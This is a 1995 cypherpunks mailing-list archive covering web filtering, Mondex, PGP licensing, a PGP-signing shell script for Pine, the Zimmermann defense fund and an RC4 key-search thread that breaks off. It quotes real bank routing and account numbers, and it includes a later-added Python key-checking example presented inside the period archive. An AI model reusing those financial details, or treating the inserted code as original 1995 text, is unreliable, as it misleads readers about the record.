From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Tue, 18 Jul 95 07:25:52 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507181425.AA10035@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> I remember one of the sponsors of the CDA ranting about pornographers
> "profiteering" from pornographic images on the Internet, blissfully unaware
> that stuff downloaded from alt.sex.binaries.insert.your.fetish.here doesn't
> profit anyone but the phone company (for the hours you stay online to get
> it).

I called up Exon's press secretary and asked him about this. He 
claimed that BBS's were uploading advertisements to the Net, and this
was the 'profiteering' referred to. He was immune to reason on this,
and felt that the CMU 'study' was rigorous.

It's true that some of the pics in those groups include stamped-in
BBS names and phone numbers, but my impression was always that this
was the BBS operators trying to do a little damage control - so that
when random users post their pix (on which they claim copyright, 
ignoring the fact that most of their scans rip off magazine 
publishers), they can recognize the 'piracy', and also earn a little
publicity.

For a good backgrounder on the story, check 
http://www.cybernothing.org/cno/reports/cyberporn.html

Peter Trei
ptrei@acm.org
 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 18 Jul 95 09:07:31 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <199507181508.LAA22050@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:10 PM 7/16/95 -0500, David K. Merriman wrote:
>>  The web page would generate a random letter, allow the user to edit
>>it, further (possibly offering the alternate phrases) before he clicks
>>on the [Send] button.
>>
>
>If someone in the DC area wants to set up such a system, I'll gladly donate
>an Intel SatisFAXion 200 fax/modem, complete with manuals, etc.
>
>This would be a Good Thing, IMHO.

The "Experiment in Remote Printing" had this idea about two years ago.  They
have well established, free, email to fax gateways around the world (including 
DC).

See their WWW page: 

http://www.dis.org/fax/faxsend.html

DCF

"And that is called paying the Dane-geld;
But we've proved it again and again,
That if once you have paid him the Dane-geld
You never get rid of the Dane." Rudyard Kipling




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Tue, 18 Jul 95 11:03:53 PDT
To: cypherpunks@toad.com
Subject: Re: SurfWatch for employees (ugh)
In-Reply-To: <199507180636.AA02056@ideath.goldenbear.com>
Message-ID: <m0sYGIp-00076GC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In servalan.mailinglist.cypherpunks Greg Broiles writes:

>-----BEGIN PGP SIGNED MESSAGE-----

>Web usage by users subjected to its reign of terror. :) WebTrack 
>is priced at $7,500 with an annual subscription to its list of 
>interesting (err, forbidden) sites priced at $1,500. The article in the

Bwahahahahaha.  You gotta admire them for sheer marketing chutzpah. 
Any internet-connected company is likely to have a firewall, with all WWW
access going thru a proxy on the firewall, and if I remember correctly, the
CERN proxy httpd can be set to deny access to whichever URLs you want; I 
suspect the other proxy httpds have similar features.  It takes hellacious
chutzpah to ask $7,500 for software that does what you can get for
free just by ftping to CERN's archives.  Barnum's principle does imply that
they'll probably find a buyer, though...

As for the wider issues involved in using this in a commercial setting, I'll
merely note that any corporation that treats its employees like children
will end up with only employees with the mental age of children.  This could
explain why much of the commercial software I see these days acts like it
was designed by a committee of retarded 10-year-olds.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 18 Jul 95 10:48:26 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: PINESIGN 2.0: A simple script for PGP signing Pine mail
Message-ID: <Pine.ULT.3.91.950718122839.11131E-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

After a couple of comments, I've updated Pinesign to a new version.  This 
new version adds the ability to choose whether your ascii signature (ie 
$HOME/.signature) is added.  Some mail servers get confused by extra 
text, so the ability to make sure nothing extra is added was requested.

Basically, if you want to sign the message both digitally and asciilly 
(is that a word :-), just press return twice after you exit your composing 
editor.  Otherwise, make the selections you want specific to the type of 
message you are sending.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#!/bin/sh

# PINESIGN v2.0
# Written by:  Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# PINESIGN is a simple program that will allow you to automatically sign 
# your email and news messages composed with the Pine 3.89 mail reader.  It 
# may also work with other mail and news programs, but it has not been 
# tested.

# INSTRUCTIONS FOR CONFIGURING PINE
# 
# You need to define the following options in Pine.  This can be done 
# either via the SETUP options in the main menu of Pine, or via editing 
# the .pinerc. 
#
# 	A)	signature-file=" "  (an empty space)
#	B)	enable-alternate-editor-cmd
#	C)	enable-alternate-editor-implicitly (optional but recommended)
#	D) 	signature-at-bottom
#	E)	editor=<exact path to this script>

# INSTRUCTIONS FOR CONFIGURING PINESIGN
#
# The PGP program must be in your path, and the PGPPATH environment 
# variable must be defined.  See the PGP documentation for details.
#
# Double check that the first line of this program points to sh. 
#
# Edit the SIGPATH and PINEEDITOR variables to point at your signature 
# (if any) and the editor you wish to use for your Pine mail.  Default 
# signature will be the file .signature in your $HOME directory.  
# Default editor is pico -z -t.

SIGPATH=$HOME/.signature-pine
PINEEDITOR='pico -z -t'

# INSTRUCTIONS FOR USING PINESIGN
#
# When you compose a message, you will compose your message as normal.  
#
# When you exit your editor (control-X in Pico), you will receive a prompt 
# asking if you wish to add your signature file to the message.  If you 
# respond with y, Y or just press return, your text signature file (often 
# $HOME/.signature) will be appended to your message.  If you type  
# anything else, your message will not have your signature added.
#
# Next, you will be prompted as to whether you wish to PGP sign your
# message.  If you answer with y, Y or return, you will be prompted for your
# PGP passphrase and then dumped back to the address/subject section of
# Pine.  If you type anything else, your message will not be signed.  
#
# If you selected it to be added, your .signature file will be appended 
# AFTER your digital signature. 
#
# If you have not defined your alternate editor to be run implicitly, you 
# will need to start it manually.  If you do not run the alternate editor,
# your .signature file will not be appended and you will also have to do
# that manually.  It is highly recommended that you define your alternate
# editor to run implicitly. 

### DO NOT EDIT ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ###

# $PINEEDITOR is left unquoted on purpose so that its options are split out
$PINEEDITOR "$1"

clear
# printf instead of "echo -n", which some /bin/sh implementations print literally
printf "Would you like to add your ASCII signature to this message? [y] "
read SIG
echo " "
printf "Would you like to sign this message with your PGP signature? [y] "
read PGP

# y, Y or an empty answer (just return) means yes
case "$PGP" in
	y|Y|"")
		# Replace the message only if pgp actually wrote a signed copy
		pgp -sat +comment="PGP Signed with PineSign 2.0" "$1" &&
			mv "$1.asc" "$1"
		;;
esac

# The text signature goes in last, so it lands AFTER the digital signature
case "$SIG" in
	y|Y|"")
		echo " " >> "$1"
		cat "$SIGPATH" >> "$1"
		;;
esac



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.0

iQCVAwUBMAvz9DokqlyVGmCFAQHq6QP9FztYKCL9lV16HWwY3E6bRzyfpqwoqCag
o7hvWivmc81uocYzo54fR5sz0pLCOAIAJL6f0ST+cRM/epdfgn/eEovCDQFZXelB
0I9mmhaUVpUdHFGfw8UD0XhuBuPWbsaNbMfYr07IVEddH8zqOKHANG0QLBmc8aVm
6btQbK8/MWE=
=wfGX
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Tue, 18 Jul 95 10:27:54 PDT
To: liberty@gate.net
Subject: Re: Root Causes Roots
Message-ID: <2482@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray asks what on earth I'm talking about the 9th amendment
not applying to the right to write code, since people were using 
codes to protect their communications long before the passage of 
the bill of rights.

I always understood "writing code" as in "cypherpunks write code" 
to mean computer code, that is FORTRAN, C++, assembler, perl or 
whatever.  I understand "writing IN code" to be the use of 
cryptographic tools such as codes or cyphers.  Thus my claim 
that the right to write IN code may have existed in the 1790s, 
but the right to write [computer] code could not (since there 
were no computers).   Of course, I could be wrong about this, 
since however you define it, it's debatable whether I'd pass the
code test to qualify as a cypherpunk, since I stopped writing 
code when I gave up programming for lawyering, and I didn't start 
writing in code when I started writing about codes.

In any case it's a matter of definitions, not timelines.

Note: I am not suggesting that the right to write code lacks 
constitutional protection; just that the protection wouldn't 
come from the 9th amendment.  My views on the constitutional 
right to write IN code, which also does not rely on the 9th 
amendment, can be found in my Clipper paper, which Hal Abelson 
has kindly ported in Netscape friendly form to:

http://

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Tue, 18 Jul 95 11:27:29 PDT
To: cypherpunks@toad.com
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
Message-ID: <199507181832.NAA27559@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>>> >and, conspiracy theories non-withstanding, we the people do not govern 
>>> >America --we are only given a short list of politicians who have sold 
>>> >their soul to CFR's satanist inner circle.
>>> 
>>> What's CFR?
>>> 
>>
>>Council on Foreign Relations.
>
>or Code of Federal Regulations.
>
or Cypherpunks Fuming and Ranting
  
  --buford





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sbryan@maroon.tc.umn.edu (Steve Bryan)
Date: Tue, 18 Jul 95 12:50:18 PDT
To: Greg Broiles <cypherpunks@toad.com
Subject: Re: SurfWatch for employees (ugh)
Message-ID: <v02110100ac31724f6c1a@[134.84.101.130]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 pm 7/17/95, Greg Broiles wrote:

[snip]
>(Pedants need not point out that personal choice (and personal filtering)
>are always appropriate, and indeed empowering. Neither WebTrack nor
>NetSurf are marketed to help people subject themselves to a regime
>of repression - they are intended and sold to allow the purchaser to
>control what others (perceived as having fewer or no rights) will read
[snip]

There doesn't seem to be any suggestion that an employer will attempt to control net access that you pay and use yourself with your own equipment. What's the problem? As far as net access from work, that will naturally sort itself out. If unfettered access is beneficial to an enterprise then that will become apparent as "repressive" companies prove incapable of competing with "permissive" companies.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@maroon.tc.umn.edu
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN 55415           Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 18 Jul 95 11:51:21 PDT
To: banisar@epic.org (Dave Banisar)
Subject: Re: A Chronology on crypto bans
Message-ID: <199507181850.OAA16134@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:08 PM 7/16/95 -0400, Dave Banisar wrote:

>Attempts to ban encryption 1977-1995
>
>1977-1980 NSA Director Inman calls crypto born secret. Should be restricted.
>Attempts to use Invention Secrecy Act of 1951 to patent inventions by
>academic researchers. Attempts to use export control laws to limit
>scientific discussion.

>NSA Threatens NSF over grants for crypto studies.

I hope that you emphasize the big impact of the IEEE/MIT/Scientific American/NSA/"A Proposal for a Public Key Encryption System" flap of 1978(?).

An awful lot of people first learned about public-key/private-key algorithms because of that fight.

DCF

"You men can't fight in here.  This is the War Room." -- Dr. Strangelove (or How I Learned to Stop Worrying and Love the Bomb).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 18 Jul 95 07:06:32 PDT
To: cypherpunks@toad.com
Subject: Mondex (forward)
Message-ID: <Pine.3.89.9507181524.A3308-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Thought this might be of interest... forwarded with permission..

From Andy Meredith (meredith@bcs.org.uk) on the ecm list :

On Jul 18,  9:21am, Marcel van der Peijl wrote:
> Subject: Re: e$, c$$$, Cyberbucks & ECash - terminology.
> > > electronic cash (also digital cash) is a general term for
> > > the concept of encrypted messages that have inherent  value
> > > - as opposed to credit notes or electronic checks. I guess
> > > that the Mondex smart cards have ecash in them, but that
> > > seems different.
>
> I am such a bad reader! You are right. This is a good definition
> of  electronic cash or digital cash. Mondex is questionable. The
> card has an account, and uses crypto to prove it is a real Mondex
> card, so you'd better believe it when it says it took the money
> of its internal balance. I would vote this is not digital cash.

I am participating in the Mondex pilot scheme in Swindon. It took me
a great deal of pushing to get _any_ details at all. The details I
did get didn't go into the encryption schemes used or any such fun
stuff. It did in fact take quite a while for me to realise the
significant differences between ecash and Mondex. As they didn't, in
the end, make me sign an NDA, I guess I can share.

1 - The Value is not encrypted on the card, that is held as plain
    text, it is the front door on the card that is heavily guarded.

    If therefore you can inject value into the card from the back
    door, it is then taken as real money. The logic being; Hey it
    managed to get through all that security which is impossible for
    anything except another mondex card to do, it must therefore be
    Mondex money ... that's Ok then.

    There can never be a software only version of Mondex
    as it stands. The trust is in the front door, not the cash
    values themselves.

2 - Some of their transaction monitoring is very "Big Brother"esque.
    As you can imagine, if a card is seen to be creating money but
    not consuming it, there IS a problem. Therefore whenever you get
    some money from a "hole in the wall", the bank sucks over your
    transaction log & error log. It will of course only ever use
    this for security monitoring. It will never follow the likes of
    AMEX and start stockpiling these transactions, using its
    knowledge of which physical entity owns what card ID, and
    using the cross reference for market research/direct mail/consumer
    profiling. No of course not. That would be TOTALLY unethical ...

3 - Mondex is billed as "Electronic Cash", but you won't find the
    concept of anonymity in there anywhere. They talk about it, but
    I haven't seen them write it down explicitly. One could suggest
    however that "Cash == Anonymous", so the scheme would have
    to be anonymous for them to have a right to the "Electronic
    Cash" title.

> So what is the name for schemes like this?

How about "Stored Value Card"

>-- End of excerpt from Marcel van der Peijl

One interesting thing that I noted. When I read through the technical
blurb on ecash a while back, I had to sit back and think very
clearly, and read very slowly. However, it was relatively easy to
understand the bits, and then even easier to put the bits together
into a system.

The reason, I suggest, is that if you understood all the encryption
technology behind ecash, and had the requirements that it has for
anonymity and security (hand in hand). You would reinvent ecash.
Maybe the layering would be subtly different, the real one and your
independent derivative wouldn't interact, but ...

If however you were to have asked me to explain ecash a week later, I
would have been totally stumped. It is a very elegant system.

Mondex, on the other hand, worried from the word go. It just didn't
seem to add up. Apart from everything else, why were they being so
damned secretive. I read and thought, and read and thought. Then it
finally dawned on me. Mondex just simply doesn't have the same
requirements list as ecash. I was prejudging the requirements from my
previous exposure to ecash.

Ask me to explain Mondex to you now ... what do you want to know :)

Andy M

     (this is my opinion of information gained outside of
       company time. It is not the opinion of my employer.)


And :


On Jul 18, 12:29pm, Marcel van der Peijl wrote:
> Subject: Re: Mondex
> > I am participating in the Mondex pilot scheme in Swindon. It
> > took me a great deal of pushing to get _any_ details at all.
>
> Of course! Security through obscurity has always been a good way of
> protecting your systems... ;)

Absolutely. That's why VISA have lost so little money :)

> > 3 - Mondex is billed as "Electronic Cash", but you won't find the
> >     concept of anonymity in there anywhere. They talk about it,
> >     but I haven't seen them write it down explicitly.
>
> Hahahaha. Let me explain. You can buy the card anonymously. This
> gives anonymity....
> NOT!

Actually, you can't. You need to supply bank details in order to get
one. At least you do for the Swindon trial. The cards in use here are
in fact combined ATM and Stored Value ;) cards. They have all your
bank details in a mag. stripe on the back of the card. The current
batch of EPOS terminals don't use this stripe, but I wait with
interest.

> They are forgetting that traceability plus one link of a person to an
> 'anonymous' account is the same as identification.

Sainsbury's (et al) sussed that one a while back. Hence the
introduction of "Customer Loyalty Cards" (yuch!!). Thereby allowing
them to bind purchases/times/locations => Credit card numbers =>
Physical customer addresses & therefore demographic data. Only in
this situation for Credit card number read Mondex card ID.

> Do you realise any ATM, and a lot of stores, have security cameras
> embedded? No, they wouldn't use that to link a person to a card,
> would they? That would be unethical...

No need. They have not only formed the link, but they are getting you
to fill in the damned form :)

> > How about "Stored Value Card"
> For Mondex, perfect. What about FV? And NetChex?

Don't know about these ones.

> About your perception of ecash: I admit that the blurb on our server
> does not fully cover the system in such a way it is easy to remember
> and explain.

Not at all. If you had asked me to explain the system while it was
still fresh in my mind, I would have had no trouble. It is very neat
and logical, but it is also pretty intricate. Apart from anything
else, I didn't feel it was necessary to hold on to the mental model
of how it works. I liked it. However, Mondex ...

>-- End of excerpt from Marcel van der Peijl

Cheers

Andy M






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 18 Jul 95 15:56:54 PDT
To: cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <199507182254.PAA06250@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:36 AM 7/18/95 EDT, Jim Grubs, W8GRT wrote:
>In practice, I'd probably buy Viacrypt for legal reasons but use PGP anyway.
That doesn't help anything - folks asked Bidzos about that one.
Of course, if your PGP version happens to output "2.7.1" as a version number,
it's not abusing any trademarks....
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 18 Jul 95 15:56:49 PDT
To: cypherpunks@toad.com
Subject: Re: SurfWatch for employees (ugh)
Message-ID: <199507182255.PAA06275@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 PM 7/17/95 -0700, Greg Broiles wrote:
>Consistent with the trend towards treating employees like children,

I'm not surprised someone sees a market for this.  I've worked at
a number of customer sites that block access to 900 numbers and
local pay-per-call numbers, which also blocks access to Time-of-day
and some vendors' customer-support numbers.

>Webster Network Strategies has announced (but apparently has not
>shipped) a product similar to SurfWatch but aimed at an employment
>environment. The product is called "WebTrack" and supposedly supports
>access lists of URLs, where access can be allowed to "all but these sites"
>or "only to these sites". The product also can be configured to log all 
>Web usage by users subjected to its reign of terror. :) WebTrack 
>is priced at $7,500 with an annual subscription to 

I assume for that price that it's a gateway product, rather than a site
license for a censored client (which would require sysadmins to go hunt
down everybody's copy of netscape...)  If so, I hope the system at least offers
caching (to save on outside bandwidth requirements and download time),
and has a fair amount of security so it doesn't become a hole in the firewall.

>its list of interesting (err, forbidden) sites priced at $1,500. 
Wow!  Folks have finally found a way to get paid for looking for porn on the
net! :-)
Surfwatch doesn't make its censored list easily available (otherwise it'd
probably get pirated, or used as an "interesting sites" index...), but apparently
it blocks access to things other than just pornography - does Webster
indicate what categories of stuff they're blocking?

#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Tue, 18 Jul 95 16:01:37 PDT
To: cypherpunks@toad.com
Subject: [shofar@Rt66.com: LEGISLATIVE WATCH AD]
Message-ID: <9507182303.AA11619@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain



fyi...

Date: Tue, 18 Jul 1995 08:35:45 -0600 (MDT)
From: DJABS <shofar@Rt66.com>
To: apologia-l@netcom.com
Subject: LEGISLATIVE WATCH AD 

   _/    _/       _/
  _/      _/  _/ _/
 _/        _/_/ _/
_/_/_/_/    _/ _/   LEGISLATIVE WATCH
___________________________________________________________
Subscribe Direct >>>>>>>>>>>>>>>>>>>>>>>>  shofar@RT66.com


Interested in catching the political wave?  "Legislative Watch" 
is an electronic newsletter with a focus on First Amendment 
concerns, religious liberty and other Constitutional issues. 
Subscribe direct at: shofar@RT66.com

    subject line:  <subscribe LW>
    message line:  <email address> <name>

____________________________________________________________________


-- 
david taffs <dat@ebt.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Tue, 18 Jul 95 13:44:22 PDT
To: liberty@gate.net
Subject: Re: Re: Root Causes Roots
Message-ID: <2515@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


The ported URL of my clipper piece seems to have gone spare.  Here's another try:

www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 18 Jul 95 08:46:38 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: Zimmerman legal fund
Message-ID: <23424.9507181545@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anon writes:
> Could someone in the know talk about the relationship between FV and
> the ZLDF? I don't like to spread misinformation, so I won't answer
> based on conjectures.

I'd be interested to hear this too, but what I am concerned about is
that the whole thing is too strongly tied to first virtual.

I mean there was the Yellow Ribbon Campaign but all URLs out of that
page point to FV, no mention of the at least two other (more
convenient for most people, and hence in Phil Z's interests) methods:

a) PGPed email CC no. to Phil Dubois (Phil Z's chief legal counsel)

b) similar PGPed email CC no. to some guy in Europe who was offering
to collect up all of the European donations, and send them to Dubois
in lump sums to save on currency exchange costs.

Both of these I believe have been signed by people who directly have
their keys signed by Phil Z himself, I have a copy of PGP signed a)
saved from the original post made by Hugh Miller
<hmiller@orion.it.luc.edu> and this is what I show to people who ask.

(copy of the bank details from Hugh's post pasted below as [1]
original PGP signed post by Hugh by email).

Geoffrey Kidd <kalothi1@violet.berkeley.edu> has the details from
Hugh's post in his Phil Z Blood Bank which he posts to
alt.security.pgp periodically, the idea being that enough folks give
money to the Phil Z legal defense fund on a regular small donation
basis, if enough people did this he could be supported indefinitely.

What I would like to know is why neither of these [a) or b)], and
especially why a) has not been mentioned on any of the widely
advertised yellow ribbon campaign pages... is it for Phil Z ... or is
it for Phil Z with the provision that you start a FV account something
which not everyone who wants to contribute to Phil Z is likely to want
to be bothered doing.

No slur on FV, just it adds unnecessary complications to donations,
through what now must be _the_ most widely publicized USENET based
effort to raise funds for Phil.

Adam

[1]
======================================================================
[...]
    To send a check or money order by mail, make it payable, NOT to Phil
Zimmermann, but to "Philip L. Dubois, Attorney Trust Account."  Mail the
check or money order to the following address:

    Philip Dubois
    2305 Broadway
    Boulder, CO USA 80304
    (Phone #: 303-444-3885)

    To send a wire transfer, your bank will need the following
information:

    Bank: VectraBank
    Routing #: 107004365
    Account #: 0113830
    Account Name: "Philip L. Dubois, Attorney Trust Account"

    Now here's the neat bit.  You can make a donation to the PZDF by
Internet mail on your VISA or MasterCard.  Worried about snoopers
intercepting your e-mail?  Don't worry -- use PGP.

    Simply compose a message in plain ASCII text giving the following:
the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank
name of your VISA or MasterCard; the name which appears on it (yours,
hopefully :-)); a telephone number at which you can be reached in case
of problems; the card number; date of expiry; and, most important, the
amount you wish to donate.  (Make this last item as large as possible.)
Then use PGP to encrypt and ASCII-armor the message using Phil Dubois's
public key, enclosed below.  (You can also sign the message if you
like.)   E-mail the output file to Phil Dubois (dubois@csm.org).
						^^^^^^^^^^^^^^

[this is a mistake Hugh made Dubois' address is dubois@csn.org as can
be easily verified from his PGP key, which is signed by Phil Z also]

Please be sure to use a "Subject:" line reading something like "Phil
Zimmermann Defense Fund" so he'll know to decrypt it right away.

    Here is Phil Dubois's public key:


                           *    *    *

    This campaign letter will be posted in a number of Usenet groups.
I will also be turning it into a FAQ-formatted document, which will be
posted monthly in the relevant groups and which will be available by
anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ.  If
you come upon, or up with, any other ways in which we can help raise funds
for Phil, drop me a line at hmiller@luc.edu and let me know, so that I
can put it in the FAQ.

[...]
======================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMAvXCSnIuJ1VakpnAQEicgP7Bn6ryN540LbdneN4PXyrODCzjy4fgW9b
XP5PG8ledoro374I/ZuOJvL8HLcSNBRRrJE1MpIRykEHi8cXlpINLdsxqVlat+OI
TxsEPntsH5WJJsaFb+xFdcAj681IEGFLJWdfx44SlH0eHVcsmQLmj5P3e/XUeIYr
1W3pyym0a0E=
=bzs2
-----END PGP SIGNATURE-----
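
Adam's bracketed note above says the mistyped address can be caught by reading the user ID out of the recipient's key. An added example of that check in Python (not from the original posts): it de-armors a key block, verifies the armor CRC-24, walks the packets and compares a stated address with the user IDs. The sample key is constructed placeholder data, and all function names are this example's own.

```python
import base64
from email.utils import parseaddr

CRC24_INIT, CRC24_POLY = 0xB704CE, 0x1864CFB
USER_ID_TAG = 13


def crc24(data: bytes) -> int:
    """CRC-24 behind the '=XXXX' checksum line of ASCII armor."""
    crc = CRC24_INIT
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= CRC24_POLY
    return crc & 0xFFFFFF


def dearmor(text: str) -> bytes:
    """Return the binary packets of an armored block, checking the CRC."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    # Inside a clearsigned message, lines starting with '-' are escaped as '- '.
    lines = [ln[2:] if ln.startswith("- ") else ln for ln in lines]
    if not lines[0].startswith("-----BEGIN PGP") or not lines[-1].startswith("-----END PGP"):
        raise ValueError("not an armored PGP block")
    body = lines[1:-1]
    if "" in body:                       # armor headers end at the first blank line
        body = body[body.index("") + 1:]
    checksum = None
    if body and body[-1].startswith("="):
        checksum = int.from_bytes(base64.b64decode(body.pop()[1:]), "big")
    data = base64.b64decode("".join(body), validate=True)
    if checksum is not None and crc24(data) != checksum:
        raise ValueError("armor CRC-24 mismatch: block is damaged")
    return data


def packets(data: bytes):
    """Yield (tag, body) per packet; PGP 2.x keys use old-format headers."""
    i = 0
    while i < len(data):
        hdr = data[i]
        if not hdr & 0x80:
            raise ValueError("bad packet header at offset %d" % i)
        if hdr & 0x40:                   # new-format header
            tag, first = hdr & 0x3F, data[i + 1]
            if first < 192:
                length, i = first, i + 2
            elif first < 224:
                length, i = ((first - 192) << 8) + data[i + 2] + 192, i + 3
            elif first == 255:
                length, i = int.from_bytes(data[i + 2:i + 6], "big"), i + 6
            else:
                raise ValueError("partial body length not expected in a key")
        else:                            # old-format header
            tag, ltype = (hdr >> 2) & 0x0F, hdr & 0x03
            if ltype == 3:               # indeterminate: runs to end of data
                length, i = len(data) - i - 1, i + 1
            else:
                n = 1 << ltype           # 1, 2 or 4 length octets
                length, i = int.from_bytes(data[i + 1:i + 1 + n], "big"), i + 1 + n
        if i + length > len(data):
            raise ValueError("truncated packet")
        yield tag, data[i:i + length]
        i += length


def user_ids(armored_key: str):
    """All user ID strings carried in the key block."""
    return [body.decode("utf-8", "replace")
            for tag, body in packets(dearmor(armored_key)) if tag == USER_ID_TAG]


def address_in_key(stated: str, armored_key: str) -> bool:
    """True if the stated address is the addr-spec of some user ID in the key.

    A match only means something if the key itself is trusted, e.g. it
    carries a signature from a key you have already verified.
    """
    wanted = stated.strip().lower()
    return any(parseaddr(uid)[1].lower() == wanted for uid in user_ids(armored_key))


def old_packet(tag: int, body: bytes) -> bytes:
    """Build an old-format packet with a one-octet length (sample data only)."""
    return bytes([0x80 | (tag << 2), len(body)]) + body


def armor(data: bytes) -> str:
    """Wrap binary packets in ASCII armor (used only to build the sample)."""
    b64 = base64.b64encode(data).decode()
    rows = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    crc = base64.b64encode(crc24(data).to_bytes(3, "big")).decode()
    return "\n".join(["-----BEGIN PGP PUBLIC KEY BLOCK-----", "Version: sample", ""]
                     + rows + ["=" + crc, "-----END PGP PUBLIC KEY BLOCK-----"])


# Constructed sample: a placeholder key packet (tag 6, NOT real key material)
# followed by a user ID packet (tag 13).
SAMPLE_KEY = armor(old_packet(6, b"\x00" * 16)
                   + old_packet(13, b"Example Recipient <recipient@example.org>"))
# The same block as it would appear quoted inside a clearsigned message.
DASHED_KEY = "\n".join("- " + ln if ln.startswith("-") else ln
                       for ln in SAMPLE_KEY.splitlines())

if __name__ == "__main__":
    print(user_ids(SAMPLE_KEY))
    print(address_in_key("recipient@exanple.org", SAMPLE_KEY))  # one-letter typo
```
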





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 18 Jul 95 13:49:15 PDT
To: cypherpunks@toad.com
Subject: Re: RC4 crack
Message-ID: <199507182047.QAA03926@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <21076.9507180656@exe.dcs.exeter.ac.uk>, aba@atlas.ex.ac.uk wrote:

>> Is there an easy way to integrate machines who are not on-net 24-7
>> into this protocol?  Not all of us have dedicated lines.:)
>
>Well you could run a local master, ... or as you are using NT right?
>you could use Andy's code when he adds socket support to interface to
>masters.
>
>As to the problem of not having 24-7 connectivity, you could either
>use the WWW page, or the server (it will do this anyway) will keep
